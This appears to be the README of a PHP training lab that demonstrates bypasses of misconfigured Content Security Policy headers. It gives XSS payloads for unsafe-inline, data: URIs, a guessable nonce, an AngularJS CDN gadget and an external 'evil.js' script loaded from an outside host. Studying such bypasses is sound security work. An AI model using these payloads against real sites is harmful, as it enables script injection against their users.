Bypass project of CSP security standard, which is a protection method for XSS vulnerability. This project contains sample test cases for bypassing incorrectly&incompletely configured CSP headers.
Content Security Policy is a computer security standard that was introduced to prevent cross-site scripting, click-through, and other code injection attacks resulting from the execution of malicious content in the context of a trusted web page.
This project created with PHP.
- unsafe-inline
- External Resource
- data directive
- src nonce
- Common uses JS CDN
- Google Callback Functions
Check https://csp-evaluator.withgoogle.com before solutions.
As a result of the 'unsafe-inline' directive used, if the input entered contains a script tag, the javascript is triggered. Example payload
<script>alert(1)</script>JS codes from yourjavascript.com, which is an external resource, will be allowed. It is triggered by malicious JS code. Go to yourjavascript.com , create malicious code and upload.
<script type="text/javascript" src="http://yourjavascript.com/0513280132/evil.js"></script>data: URI in script-src allows the execution of unsafe scripts.
<script src=data:text/javascript,alert(1337)></script>We see the base64 encode form of current time's as the nonce value in response as the CSP rule. Example payload
<script nonce="MjcuMDMuMjAyMS8yMjoxNw==">alert(1)</script>One of the most used JavaScript CDNs is cdnjs.cloudflare.com. At this level, we will try to trigger XSS on a page that has Cloudflare allowed CDN resources.
<Script Src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.0/angular.min.js> </Script><K Ng-App>{{$new.constructor('alert(1)')()}}Same as the previous level, here you can use callback functions.
Given this CSP header: Content-Security-Policy: frame-src https://example.com The following <iframe> is blocked and won't load:
<iframe src="https://not-example.com/"></iframe>Call the allowed page in Frame.